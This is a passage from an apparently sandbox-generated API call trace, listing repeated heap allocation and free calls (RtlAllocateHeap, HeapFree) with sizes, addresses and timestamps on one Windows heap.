(in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.114] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.115] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 